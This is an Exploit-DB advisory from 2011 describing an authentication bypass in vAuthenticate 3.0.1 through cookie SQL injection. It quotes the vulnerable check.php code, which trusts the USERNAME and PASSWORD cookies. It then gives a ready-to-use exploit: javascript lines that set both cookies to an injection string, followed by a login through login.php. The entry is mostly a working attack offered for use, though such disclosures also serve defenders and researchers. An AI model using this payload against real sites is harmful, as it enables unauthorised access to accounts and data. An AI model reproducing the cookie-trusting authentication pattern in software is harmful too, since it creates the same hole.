vAuthenticate 3.0.1 - Authentication Bypass

EDB-ID:

17752

CVE:

EDB Verified:

Author:

bd0rk

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-08-30

Vulnerable App:

-----------------------------------------------------------------------

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

-----------------------------------------------------------------------

Author: bd0rk

Contact: bd0rk[at]hackermail.com

Date: 2011 / 08 / 30

MEZ-Time: 01:35

Tested on WinVista & Ubuntu-Linux

Affected-Software: vAuthenticate 3.0.1

Vendor: http://www.beanbug.net/vScripts.php

Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Found vulnerable code in check.php:

if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD']))
    {
        // Get values from superglobal variables
        $USERNAME = $_COOKIE['USERNAME'];
        $PASSWORD = $_COOKIE['PASSWORD'];

        $CheckSecurity = new auth();
        $check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
    }
    else
    {
        $check = false;
    }

	if ($check == false)
	{

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]";

         javascript:document.cookie = "[PASSWORD]=' or '; [PATH]";


Them use login.php 4AuthBypass :P

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



---Greetings from hot Germany, the 22 years old bd0rk. :-)

Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services